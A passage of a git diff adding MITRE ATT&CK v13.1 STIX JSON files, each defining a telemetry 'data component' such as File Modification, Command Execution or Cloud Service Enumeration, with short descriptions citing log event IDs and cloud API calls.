(ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json new file mode 100644 index 0000000000000000000000000000000000000000..cc2de0ddbf66504170da7d99294220e8be87f054 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fdc36971-2dd9-4e92-ac6f-fa67fceced95", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Metadata", + "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json new file mode 100644 index 0000000000000000000000000000000000000000..58f84bb56625bab6fa195cb35ddb59ba0ef979f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2c77e092-c0b7-4d2d-9d4e-080528603500", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Modification", + "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json new file mode 100644 index 0000000000000000000000000000000000000000..738d6355aa08f47f9588f858671ee65d6aa752f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7cc2c7f9-21f5-4390-92e7-3472aeeb4d23", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Pod Modification", + "description": "Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)", + "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json new file mode 100644 index 0000000000000000000000000000000000000000..3f7420edd1f94963110e999d8ef14f0c354f4428 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--9a103203-33ee-4278-b260-120114b59ebf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json new file mode 100644 index 0000000000000000000000000000000000000000..7b471f4c3bbc56ab581759100d505715a3dbd779 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--13066a94-1a26-4911-9ae5-5248103bcf4c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Access", + "description": "Opening of a data storage device with an assigned drive letter or mount point", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json new file mode 100644 index 0000000000000000000000000000000000000000..e0b8e9f420b67c244c7ccdd6a4298d660c4fd23a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9f44626a-16fe-4d44-b3a6-92c438cf71c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Firewall Metadata", + "description": "Contextual data about a firewall and activity around it such as name, policy, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json new file mode 100644 index 0000000000000000000000000000000000000000..954688f5d15254390d5de3004084c7eb078bb4e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9ac835ed-5210-4f58-af50-e230bb646343", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json new file mode 100644 index 0000000000000000000000000000000000000000..12c3a99d4aa0fe1f8877a389b77b6e8297907e90 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--618787e6-1b15-41fb-b5bd-447d9f18d7b7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Deletion", + "description": "Removal of an instance (ex: instance.delete within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json new file mode 100644 index 0000000000000000000000000000000000000000..2d2d99f8b9581ab5351f66fcb955e8827cb13604 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--66700709-0919-4b30-b8d6-db5641da8ed1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json new file mode 100644 index 0000000000000000000000000000000000000000..4008665287d9a9e565a0b75a79b57c1f53ab948a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--07a956e7-9c3a-4c75-af67-cc72a8eb3048", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Creation", + "description": "Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json new file mode 100644 index 0000000000000000000000000000000000000000..d86d4337346091bba40c7ade0c407eca076d2e34 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--1eca3ad8-dea6-43d7-a2fe-d56ad8b1ec40", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Modification", + "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json new file mode 100644 index 0000000000000000000000000000000000000000..32e6bb11390feb7bac2b6f04603465b76d367773 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--99562069-403b-4620-b6ae-5e0af004dd96", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:22:45.613Z", + "name": "Host Status", + "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json new file mode 100644 index 0000000000000000000000000000000000000000..4dcec5f2f6fa7f154d8e72619706445f14a5654c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e72bf015-daf7-4111-8fce-d7e869666645", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Image Deletion", + "description": "Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json new file mode 100644 index 0000000000000000000000000000000000000000..5abcf2defd2667f987754fa752a3cf66dc8b7674 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--664a2b2f-33d9-4d6c-b968-b66153c75e33", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Metadata", + "description": "Contextual data about a snapshot, which may include information such as ID, type, and status", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json new file mode 100644 index 0000000000000000000000000000000000000000..7cfd4e9a3c3a34d63a361dd54587eb21bf426f1a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fad7a4f1-fa9b-4386-9c85-ee531de07be4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Cloud Service Enumeration", + "description": "An extracted list of cloud services (ex: AWS ECS ListServices)", + "x_mitre_data_source_ref": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json new file mode 100644 index 0000000000000000000000000000000000000000..7b19e3dcd815dabbc050acc0795a07cdd19bf1e4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0a7be524-43bf-4b46-9ce8-28d45410c4be", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Group Metadata", + "description": "Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group", + "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json new file mode 100644 index 0000000000000000000000000000000000000000..fa15963d11251002849ae352f2f89a47c1d56c44 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2323d536-b2f1-459f-acd1-5590796dd4ba", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Group Enumeration", + "description": "An extracted list of available groups and/or their associated settings (ex: AWS list-groups)", + "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json new file mode 100644 index 0000000000000000000000000000000000000000..9da0fa1b2f3666efbfb29c9dd039539b10375182 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--4f1f9f19-1148-4440-807b-ddea2a31cb93", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Social Media", + "description": "Established, compromised, or otherwise acquired social media personas", + "x_mitre_data_source_ref": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json new file mode 100644 index 0000000000000000000000000000000000000000..5c8ca664e6d40c3253af9bf4a806ad7e700ab6ea --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--21b8755a-d1b1-4d02-81e0-a03ea1580791", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Object Deletion", + "description": "Removal of an active directory object (ex: Windows EID 5141)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json 